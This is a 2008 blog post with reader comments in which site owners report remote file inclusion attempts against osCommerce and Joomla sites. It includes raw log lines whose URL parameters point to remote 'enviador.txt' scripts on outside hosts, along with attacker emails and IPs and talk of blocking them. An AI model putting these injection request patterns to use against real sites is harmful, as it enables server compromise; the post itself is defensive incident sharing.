Jun 1, 2008

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a php script located at.
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=¶=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the OSCOMMERCE search routine.

10 comments:

Anonymous said...

also
http://www.neobundao.com/enviador.txt?&servidor=
and
http://www.darkhand.net/Bots/enviador.txt?&

Anonymous said...

Another one http://www.opengear.at/rotator/enviador.txt

Anonymous said...

hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites

Abhishek Sachan said...

who the hell they are ... trying same on 4 of my websites... URL:[/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com][/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com] From IP:{173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2} I think we must block these IP

Anonymous said...

Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mailaddress premmy35@gmail.com

I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?

[BVS]

Anonymous said...

@Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.

[BVS]

Abhishek Sachan said...

yeah you are right.. blocking IP is something difficult for them but i have something new in my mind not implemented yet... we can detect their user_agents they are generally of type bots.. there are databases present online which can tell u about the useragents we can block them by scripts but this method can also fail bcoz its easy to change user agent...

tmaster said...

If you install M&M Autoban you can ban the action they are taking it will then take care of banning the IPS it detects doing this.

Add the URSLS and email addresses to the hackers file, In most cases they are already in it. Look for a new version soon as the next upgrade will let you ban countries you do not want on your site.

citizenblogger said...

I also detect in my web server logs a similar attack but using "sexycabrito@gmail.com" instead of "premy35@gmail.com", can someone give me please more explanation about the mechanisme of this attack

best regards

citizenblogger said...

hello
i have the same logs appear in my web server but using "sexycabrito@gmail.com" instead of "premy35@gmail.com" can anybody gves me more explanation about these attacks
thanxs
best regards